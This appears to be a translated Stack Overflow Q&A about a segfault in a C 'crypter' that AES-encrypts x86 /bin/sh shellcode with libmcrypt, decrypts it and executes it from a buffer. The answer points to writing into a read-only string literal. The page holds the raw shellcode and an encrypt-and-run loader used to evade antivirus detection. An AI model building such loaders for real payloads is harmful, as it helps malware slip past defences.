mcrypt上的分段错误(可能与缓冲区有关)

时间:2013-05-02 13:59:02

标签: c linux x86 shellcode

我试图在c中使用AES加密shellcode来构建我自己的crypter。现在我已经在一个程序中制作了一个程序的PoC,可以在下面找到:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * MCrypt API available online:
 * http://linux.die.net/man/3/mcrypt
 */
#include <mcrypt.h>

#include <math.h>
#include <stdint.h>
#include <stdlib.h>

int encrypt(
    void* buffer,
    int buffer_len, /* Because the plaintext could include null bytes*/
    char* IV,
    char* key,
    int key_len
){
  MCRYPT td = mcrypt_module_open("rijndael-128", NULL, "cbc", NULL);
  int blocksize = mcrypt_enc_get_block_size(td);
  if( buffer_len % blocksize != 0 ){return 1;}

  mcrypt_generic_init(td, key, key_len, IV);
  mcrypt_generic(td, buffer, buffer_len);
  mcrypt_generic_deinit (td);
  mcrypt_module_close(td);

  return 0;
}

int decrypt(
    void* buffer,
    int buffer_len,
    char* IV,
    char* key,
    int key_len
){
  MCRYPT td = mcrypt_module_open("rijndael-128", NULL, "cbc", NULL);
  int blocksize = mcrypt_enc_get_block_size(td);
  if( buffer_len % blocksize != 0 ){return 1;}

  mcrypt_generic_init(td, key, key_len, IV);
  mdecrypt_generic(td, buffer, buffer_len);
  mcrypt_generic_deinit (td);
  mcrypt_module_close(td);

  return 0;
}


int main()
{
{
  MCRYPT td, td2;
  unsigned char * plaintext = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
  char* IV = "AAAAAAAAAAAAAAAA";
  char *key = "0123456789abcdef";
  int keysize = 16; /* 128 bits */
  unsigned char buffer[32];
  int counter;
  int buffer_len = 32;



 for ( counter = 0; counter < buffer_len; counter++){
   buffer[counter]=0x90;
  }

  strncpy(buffer, plaintext, buffer_len);

  int plain_len = strlen(plaintext);

  printf("==Plain Binary==\n");
  for ( counter = 0; counter < plain_len; counter++){
    printf("%02x",plaintext[counter]);
  }

  encrypt(buffer, buffer_len, IV, key, keysize);

  printf("\n==Encrypted  Binary==\n");

  for ( counter = 0; counter < buffer_len; counter++){
   printf("\\x%02x",buffer[counter]);
  }

  decrypt(buffer, buffer_len, IV, key, keysize);

  printf("\n==decrypted  Binary==\n");
  for ( counter = 0; counter < buffer_len; counter++){
    if (buffer[counter] == 0){
        buffer[counter] = 0x90;
    }
    printf("\\x%02x",buffer[counter]);
  }
  printf("\n");
  printf("Shellcode Length:  %d\n", strlen(buffer));
  int (*ret)() = (int(*)())buffer;
  ret();


  return 0;
}

我的目标是获取加密的shellcode,解密并运行它。但是,当我尝试使用mcrypt_generic_init(td, key, key_len, IV);函数初始化mcrypt时,我似乎遇到了分段错误。我真的不确定导致分段错误的原因。如果有人有想法?

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * MCrypt API available online:
 * http://linux.die.net/man/3/mcrypt
 */
#include <mcrypt.h>

#include <math.h>
#include <stdint.h>
#include <stdlib.h>


int decrypt(
    void* buffer,
    int buffer_len,
    char* IV,
    char* key,
    int key_len
){
  MCRYPT td = mcrypt_module_open("rijndael-128", NULL, "cbc", NULL);
  int blocksize = mcrypt_enc_get_block_size(td);
  if( buffer_len % blocksize != 0 ){return 1;}
  printf("proceeding to mcrypt\n");
  mcrypt_generic_init(td, key, key_len, IV);
  printf("initiated mcrypt") ;


  mdecrypt_generic(td, buffer, buffer_len);
  printf("proceeding to mcrypt\n");

  mcrypt_generic_deinit (td);
  printf("proceeding to mcrypt\n");

  mcrypt_module_close(td);
  printf("returning from mcrypt\n");
  return 0;
}

int main()
{     
  MCRYPT td,td2;
  char* IV = "AAAAAAAAAAAAAAAA";
  char *key = "0123456789abcdef"; 
  int keysize = 16; /* 128 bits */
  unsigned char* buffer = "\x5c\xd8\xcf\x9e\x8f\x3a\x9f\x52\x2e\x3d\x51\x06\x00\xde\xa6\x64\x45\x5f\x62\x53\x75\xab\xbd\xe1\x33\xc1\x69\xbf\xed\xc8\x5c\xaa";
  int buffer_len = 32;
  int counter; 

  decrypt(buffer, buffer_len, IV, key, keysize);

 for ( counter = 0; counter < buffer_len; counter++){
        printf("0x%02x",buffer[counter]);
  }

  printf("\n");
  printf("Shellcode Length:  %d\n", strlen(buffer));
  int (*ret)() = (int(*)())buffer;
  ret();


  return 0;
}

1 个答案:

答案 0 :(得分:3)

您正在尝试使用文字字符串进行书写。这是错误的,因为允许编译器在只读内存中分配文字字符串(他们确实这样做了。)

改变这个:

char *buffer = "..."

进入这个:

char buffer[] = "..."

后者将在堆栈上分配一个数组(因此可以修改)并使用文字字符串中的数据动态填充它(每次输入函数时重新完成)。